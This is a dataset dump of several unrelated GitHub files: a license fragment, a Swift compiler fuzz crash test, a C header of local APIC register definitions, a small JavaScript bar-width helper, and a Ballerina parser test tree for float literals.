FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Generated by CocoaPods - https://cocoapods.org
|
{
"pile_set_name": "Github"
}
| null | null |
// Distributed under the terms of the MIT license
// Test case submitted to project by https://github.com/practicalswift (practicalswift)
// Test case found by fuzzing
class A{class d<T where f:A{var b{typealias e=a.c
|
{
"pile_set_name": "Github"
}
| null | null |
/* SPDX-License-Identifier: GPL-2.0 */
/*
* From coreboot file of same name
*
* Copyright (C) 2014 Google, Inc
*/
#ifndef _ARCH_ASM_LAPIC_H
#define _ARCH_ASM_LAPIC_H
#define LAPIC_DEFAULT_BASE 0xfee00000
#define LAPIC_ID 0x020
#define LAPIC_LVR 0x030
#define LAPIC_TASKPRI 0x080
#define LAPIC_TPRI_MASK 0xff
#define LAPIC_RRR 0x0c0
#define LAPIC_SPIV 0x0f0
#define LAPIC_SPIV_ENABLE 0x100
#define LAPIC_ICR 0x300
#define LAPIC_DEST_SELF 0x40000
#define LAPIC_DEST_ALLINC 0x80000
#define LAPIC_DEST_ALLBUT 0xc0000
#define LAPIC_ICR_RR_MASK 0x30000
#define LAPIC_ICR_RR_INVALID 0x00000
#define LAPIC_ICR_RR_INPROG 0x10000
#define LAPIC_ICR_RR_VALID 0x20000
#define LAPIC_INT_LEVELTRIG 0x08000
#define LAPIC_INT_ASSERT 0x04000
#define LAPIC_ICR_BUSY 0x01000
#define LAPIC_DEST_LOGICAL 0x00800
#define LAPIC_DM_FIXED 0x00000
#define LAPIC_DM_LOWEST 0x00100
#define LAPIC_DM_SMI 0x00200
#define LAPIC_DM_REMRD 0x00300
#define LAPIC_DM_NMI 0x00400
#define LAPIC_DM_INIT 0x00500
#define LAPIC_DM_STARTUP 0x00600
#define LAPIC_DM_EXTINT 0x00700
#define LAPIC_VECTOR_MASK 0x000ff
#define LAPIC_ICR2 0x310
#define GET_LAPIC_DEST_FIELD(x) (((x) >> 24) & 0xff)
#define SET_LAPIC_DEST_FIELD(x) ((x) << 24)
#define LAPIC_LVT0 0x350
#define LAPIC_LVT1 0x360
#define LAPIC_LVT_MASKED (1 << 16)
#define LAPIC_LVT_LEVEL_TRIGGER (1 << 15)
#define LAPIC_LVT_REMOTE_IRR (1 << 14)
#define LAPIC_INPUT_POLARITY (1 << 13)
#define LAPIC_SEND_PENDING (1 << 12)
#define LAPIC_LVT_RESERVED_1 (1 << 11)
#define LAPIC_DELIVERY_MODE_MASK (7 << 8)
#define LAPIC_DELIVERY_MODE_FIXED (0 << 8)
#define LAPIC_DELIVERY_MODE_NMI (4 << 8)
#define LAPIC_DELIVERY_MODE_EXTINT (7 << 8)
unsigned long lapic_read(unsigned long reg);
void lapic_write(unsigned long reg, unsigned long v);
void enable_lapic(void);
void disable_lapic(void);
unsigned long lapicid(void);
int lapic_remote_read(int apicid, int reg, unsigned long *pvalue);
void lapic_setup(void);
#endif
|
{
"pile_set_name": "Github"
}
| null | null |
import {barFraction, barEnd} from "../constants";
export default function barWidth(array) {
const n = array.length;
if (n === 0) return 0;
if (n === 1) return barFraction;
return (barFraction - barEnd * (n - 1)) / n;
}
|
{
"pile_set_name": "Github"
}
| null | null |
{
"kind": "FUNCTION_DEFINITION",
"children": [
{
"kind": "LIST",
"children": []
},
{
"kind": "FUNCTION_KEYWORD",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "IDENTIFIER_TOKEN",
"value": "foo"
},
{
"kind": "FUNCTION_SIGNATURE",
"children": [
{
"kind": "OPEN_PAREN_TOKEN"
},
{
"kind": "LIST",
"children": []
},
{
"kind": "CLOSE_PAREN_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "FUNCTION_BODY_BLOCK",
"children": [
{
"kind": "OPEN_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
},
{
"kind": "LIST",
"children": [
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
},
{
"kind": "COMMENT_MINUTIAE",
"value": "// DecimalNumber FloatingPointTypeSuffix"
},
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
},
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25f"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25F"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25d"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
},
{
"kind": "ASSIGNMENT_STATEMENT",
"children": [
{
"kind": "SIMPLE_NAME_REFERENCE",
"children": [
{
"kind": "IDENTIFIER_TOKEN",
"value": "a",
"leadingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
],
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
}
]
},
{
"kind": "EQUAL_TOKEN",
"trailingMinutiae": [
{
"kind": "WHITESPACE_MINUTIAE",
"value": " "
}
]
},
{
"kind": "NUMERIC_LITERAL",
"children": [
{
"kind": "DECIMAL_FLOATING_POINT_LITERAL_TOKEN",
"value": "25D"
}
]
},
{
"kind": "SEMICOLON_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
},
{
"kind": "CLOSE_BRACE_TOKEN",
"trailingMinutiae": [
{
"kind": "END_OF_LINE_MINUTIAE",
"value": "\n"
}
]
}
]
}
]
}
|
{
"pile_set_name": "Github"
}
| null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.